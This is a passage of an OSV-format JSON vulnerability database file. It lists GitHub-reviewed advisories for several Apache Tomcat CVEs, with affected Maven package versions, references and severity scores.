"9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-r6j3-px5g-cq3x/GHSA-r6j3-px5g-cq3x.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.94" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", 
"8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-r6j3-px5g-cq3x/GHSA-r6j3-px5g-cq3x.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45648" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/59583245639d8c42ae0009f4a4a70464d3ea70a0" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/8ecff306507be8e4fd3adee1ae5de1ea6661a8f4" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/c83fe47725f7ae9ae213568d9039171124fb7ec6" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/eb5c094e5560764cda436362254997511a3ca1f6" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/2pv8yz1pyp088tsxfb7ogltk9msk0jdp" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20231103-0007" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5521" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5522" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/10/10/10" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2023-10-10T22:29:58Z", "nvd_published_at": "2023-10-10T19:15:09Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rq2w-37h9-vg94", "published": "2023-01-03T21:30:21Z", "modified": "2024-04-23T22:00:59.346897Z", "aliases": [ "BIT-tomcat-2022-45143", "CVE-2022-45143" ], "summary": "Apache Tomcat improperly escapes input from JsonErrorReportValve", "details": "The `JsonErrorReportValve` in Apache Tomcat 8.5.83, 9.0.40 to 
9.0.68 and 10.1.0-M1 to 10.1.1 does not escape the `type`, `message` or `description` values. In some circumstances these are constructed from user provided data and it was therefore possible for users to supply values that invalidated or manipulated the JSON output.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.83" }, { "fixed": "8.5.84" } ] } ], "versions": [ "8.5.83" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-rq2w-37h9-vg94/GHSA-rq2w-37h9-vg94.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.40" }, { "fixed": "9.0.69" } ] } ], "versions": [ "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.68", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-rq2w-37h9-vg94/GHSA-rq2w-37h9-vg94.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0" }, { "fixed": "10.1.2" } ] } ], "versions": [ "10.1.0", "10.1.1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.1.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-rq2w-37h9-vg94/GHSA-rq2w-37h9-vg94.json" } }, { 
"package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0" }, { "fixed": "10.1.2" } ] } ], "versions": [ "10.1.0", "10.1.1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.1.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-rq2w-37h9-vg94/GHSA-rq2w-37h9-vg94.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-util", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-util" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.83" }, { "fixed": "8.5.84" } ] } ], "versions": [ "8.5.83" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-rq2w-37h9-vg94/GHSA-rq2w-37h9-vg94.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-util", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-util" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.40" }, { "fixed": "9.0.69" } ] } ], "versions": [ "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/01/GHSA-rq2w-37h9-vg94/GHSA-rq2w-37h9-vg94.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-45143" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/0cab3a56bd89f70e7481bb0d68395dc7e130dbbf" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/6a0ac6a438cbbb66b6e9c5223842f53bf0cb50aa" }, { "type": "WEB", "url": 
"https://github.com/apache/tomcat/commit/b336f4e58893ea35114f1e4a415657f723b1298e" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/yqkd183xrw3wqvnpcg3osbcryq85fkzj" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202305-37" } ], "database_specific": { "cwe_ids": [ "CWE-116", "CWE-74" ], "github_reviewed": true, "github_reviewed_at": "2023-01-05T12:02:50Z", "nvd_published_at": "2023-01-03T19:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-vfww-5hm6-hx2j", "published": "2025-10-27T18:31:13Z", "modified": "2025-11-05T21:08:45.601566Z", "aliases": [ "CVE-2025-55754" ], "related": [ "CGA-86pw-75p3-rgc3", "CGA-8f6v-724m-6v95", "CGA-mffp-g3xg-8r68" ], "summary": "Apache Tomcat Vulnerable to Improper Neutralization of Escape, Meta, or Control Sequences", "details": "Tomcat did not escape ANSI escape sequences in log messages. If Tomcat was running in a console on a Windows operating system, and the console supported ANSI escape sequences, it was possible for an attacker to use a specially crafted URL to inject ANSI escape sequences to manipulate the console and the clipboard and attempt to trick an administrator into running an attacker controlled command. While no attack vector was found, it may have been possible to mount this attack on other operating systems.\n\n\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.10, from 10.1.0-M1 through 10.1.44, from 9.0.40 through 9.0.108.\n\nThe following versions were EOL at the time the CVE was created but are \nknown to be affected: 8.5.60 though 8.5.100. 
Other, older, EOL versions may also be affected.\nUsers are recommended to upgrade to version 11.0.11 or later, 10.1.45 or later or 9.0.109 or later, which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.11" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.10", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.45" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.42", "10.1.43", "10.1.44", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.40" }, { "fixed": "9.0.109" } ] } ], "versions": [ "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.106", "9.0.107", "9.0.108", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.60" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.100", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } }, { "package": { "name": 
"org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.11" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.10", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.45" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.42", "10.1.43", "10.1.44", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", 
"purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.40" }, { "fixed": "9.0.109" } ] } ], "versions": [ "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.106", "9.0.107", "9.0.108", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.60" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.100", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { 
"fixed": "11.0.11" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.10", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.45" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.42", "10.1.43", "10.1.44", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.40" }, { "fixed": "9.0.109" } ] } ], "versions": [ "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.106", 
"9.0.107", "9.0.108", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.60" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.100", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-vfww-5hm6-hx2j/GHSA-vfww-5hm6-hx2j.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55754" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/138d7f5cfaae683078948303333c080e6faa75d2" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/5a3db092982c0c58d4855304167ee757fe5e79bb" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/a03cabf3a36a42d27d8d997ed31f034f50ba6cd5" }, { "type": "PACKAGE", "url": 
"https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/j7w54hqbkfcn0xb9xy0wnx8w5nymcbqd" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.1.45" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html#Fixed_in_Apache_Tomcat_11.0.11" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.109" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/10/27/5" } ], "database_specific": { "cwe_ids": [ "CWE-150" ], "github_reviewed": true, "github_reviewed_at": "2025-10-28T17:57:42Z", "nvd_published_at": "2025-10-27T18:15:42Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-wc4r-xq3c-5cf3", "published": "2025-06-16T15:32:28Z", "modified": "2025-11-03T23:15:58.045513Z", "aliases": [ "BIT-tomcat-2025-49125", "CVE-2025-49125" ], "related": [ "CGA-mqcq-4vj8-j6r4" ], "summary": "Apache Tomcat - Security constraint bypass for pre/post-resources", "details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Apache Tomcat.  When using PreResources or PostResources mounted other than at the root of the web application, it was possible to access those resources via an unexpected path. That path was likely not to be protected by the same security constraints as the expected path, allowing those security constraints to be bypassed.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.7, from 10.1.0-M1 through 10.1.41, from 9.0.0.M1 through 9.0.105. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. 
Other, older, EOL versions may also be affected.\n\nUsers are recommended to upgrade to version 11.0.8, 10.1.42 or 9.0.106, which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.8" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7" ], "database_specific": { "last_known_affected_version_range": "\u003c= 11.0.7", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-wc4r-xq3c-5cf3/GHSA-wc4r-xq3c-5cf3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.42" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.1.41", "source": 
